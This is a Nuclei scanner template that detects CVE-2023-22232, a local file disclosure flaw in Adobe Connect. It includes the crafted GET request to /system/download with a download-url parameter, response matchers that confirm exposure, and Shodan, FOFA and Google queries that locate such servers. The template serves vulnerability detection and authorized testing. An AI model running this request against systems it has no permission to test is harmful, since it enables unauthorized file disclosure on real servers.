nuclei-templates/http/cves/2023/CVE-2023-22232.yaml

51 lines
1.8 KiB
YAML
Raw Normal View History

2023-12-09 09:38:36 +00:00
id: CVE-2023-22232
info:
name: Adobe Connect < 12.1.5 - Local File Disclosure
2024-02-12 13:32:38 +00:00
author: 0xr2r
2023-12-09 09:38:36 +00:00
severity: medium
description: |
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction
reference:
- https://helpx.adobe.com/security/products/connect/apsb23-05.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-22232
- http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html
- https://github.com/ARPSyndicate/cvemon
2023-12-09 09:38:36 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2023-22232
cwe-id: CWE-284,NVD-CWE-noinfo
2024-05-31 19:23:20 +00:00
epss-score: 0.12731
epss-percentile: 0.95463
cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:*
2023-12-09 09:38:36 +00:00
metadata:
verified: true
max-request: 1
vendor: adobe
product: connect
shodan-query:
- title:"Adobe Connect"
- http.title:"openvpn connect"
2024-05-31 19:23:20 +00:00
fofa-query: title="openvpn connect"
google-query: intitle:"openvpn connect"
tags: packetstorm,cve2023,cve,adobe,lfd,download
2023-12-09 09:38:36 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"
matchers-condition: and
matchers:
- type: word
words:
- "Save to My Computer"
- "exam.pdf"
- "Click to Download"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100d33658fadb0c3b76af58bde6da9db8df7fb5aaa693f34c25111a6a7599092d93022074ca5a695e763d3b2e8d2ccd96f1a2005c6400c8ffed5d784e9d494b2d71fcb1:922c64590222798bb761d5b6d8e72950